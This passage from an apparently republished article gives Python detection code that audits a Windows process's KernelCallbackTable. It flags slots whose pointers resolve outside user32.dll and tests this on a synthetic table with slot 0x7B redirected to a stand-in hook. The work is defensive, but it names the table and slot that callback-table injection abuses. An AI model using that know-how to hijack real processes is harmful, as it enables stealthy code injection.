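    """Return the name of the module whose image range contains address, or None."""
    for name, (base, size) in modules.items():
        if base <= address < base + size:
            return name
    return None


def audit_kernel_callback_table(entries, modules=MODULES, expected="user32.dll"):
    """Flag table slots that do not resolve into the expected module.

    entries: pointer values read from KernelCallbackTable, in index order.
    Returns one finding per suspicious slot with the index, the API name (when
    known), the pointer value and the module it actually resolves to.
    """
    findings = []
    for index, ptr in enumerate(entries):
        owner = module_for(ptr, modules)
        if owner != expected:
            findings.append({
                "index": index,
                "api": API_NAMES.get(index, f"callback_{index:#x}"),
                "pointer": ptr,
                "resolved_module": owner,
            })
    return findings


def build_sample_table(hooked_index=None, hook_target=0x00007ff613041000):
    """Constructed table of 0x80 slots inside user32, optionally with one slot redirected.

    The default hook_target is an address outside every listed system module
    (it stands in for a FakeCallBack routine inside the process's own image).
    """
    user32_base = MODULES["user32.dll"][0]
    table = [user32_base + 0x37840 + 0x40 * i for i in range(0x80)]
    if hooked_index is not None:
        table[hooked_index] = hook_target
    return table


if __name__ == "__main__":
    for finding in audit_kernel_callback_table(build_sample_table(hooked_index=0x7B)):
        print(f"slot {finding['index']:#x} ({finding['api']}) -> {finding['pointer']:#x} "
              f"resolves to {finding['resolved_module']}")
```

On a live system the entries would come from reading the process's PEB, and the module map from its loaded-module list; the check itself does not depend on which slot was hooked, so it catches redirection of any callback, not only 0x7B.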


Original article, author: 九賢生活小編; if reposting, please credit the source: http:///132313.html